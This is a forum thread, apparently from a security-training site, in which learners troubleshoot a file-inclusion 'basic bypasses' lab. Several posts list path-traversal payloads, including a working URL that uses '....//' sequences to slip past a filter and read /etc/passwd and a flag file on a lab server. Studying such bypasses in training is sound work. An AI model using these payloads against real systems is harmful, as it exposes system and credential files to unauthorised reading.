FILE INCLUSION - Basic Bypasses Question

Spazzrabbit1 · June 29, 2022, 9:21pm

Hello there,

I tryed all of below both URL encoded and clear.
What i do wrong ?

languages/es.php

./languages/…/…/…/…/…/es.php

…//languages/es.php

…//languages/…/…/…/…/etc/passwd

RandomAndNonRandomName/…/…/…/etc/passwd/././././././././././.(2048 thing. Goes and goes.)

./languages/…/…/…/…/…/flag.txt%00

…//languages/…/…/…/…/…/flag.txt

languages/…/…/…/…/…/flag.txt%00

./languages/…/…/…/…/…/flag.txt%00

languages/…/…/…/…/…/flag.txt

.\languages..........\flag.txt%00

languages/…/…/…/…/…/flag.txt%00

./languages/etc/passwd%00

xtal · June 30, 2022, 9:27am

There are three dots ... between the slashes, but Unix use two dots as parent directory name ..

Spazzrabbit1 · June 30, 2022, 9:44am

There was two before i post.
It changed to three after i posted

Spazzrabbit1 · July 1, 2022, 10:42am

@xtal have any idea ?.

xtal · July 1, 2022, 11:14am

Sorry. No specific idea.

The three points were an obvious error. But it was just an error in presentation, not the real error.

I would start with ./../etc/passwd and then insert more /../ until I can access the passwd file. You know absolute path and filename of the passwd file so I would try to access this file first. If you are on a unix machine there will be the file /etc/passwd.

Spazzrabbit1 · July 3, 2022, 10:02pm

Well… Still could’t resolve it.

Aseth · July 10, 2022, 12:56pm

Hey,
Did you slved?
I have 3 days trying…

Spazzrabbit1 · July 11, 2022, 6:10pm

I did everything in the training page but couldnt solve…

Zsombi · July 24, 2022, 8:57pm

Does anybody have a solution to this?
I went through the cheat sheet, encoded, than double encoded all of the examples still unable to open the passwd file not to mention the actual task.

mach1ne · July 25, 2022, 10:00am

When you guys first visit a page the parameter includes ‘languages/page/’. What if the code checks if parameter contains ‘languages’?

mach1ne · July 25, 2022, 10:01am

If you want PM me, I can provide automatic tool that solves lfi automatically.

Spazzrabbit1 · July 25, 2022, 2:49pm

This one works.

http://206.189.124.56:32620/index.php?language=languages///....//....//....//....//....//....//.....//....//....//....//etc/passwd

Zsombi · July 25, 2022, 6:20pm

Thank you, it works indeed!

R3dHawk · October 10, 2022, 12:28pm

languages///....//....//....//.....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd

mattdragon2 · January 16, 2023, 1:31pm

One way I found out was to try and get back to the original file to make sure I had the encoding correct for example:

languages/....//languages/en.php

Should take you back to the en.php page.
From there, I changed en.php to flag.txt

languages/....//flag.txt

Then it’s just a guessing game on how many ....// you need to add.
Unless there is a specific way to find out how many …// ?
I was confused though because I thought the flag file was in the languages directory since it said /flag.txt

trav · December 29, 2023, 2:29pm

any hints on how to solve this ?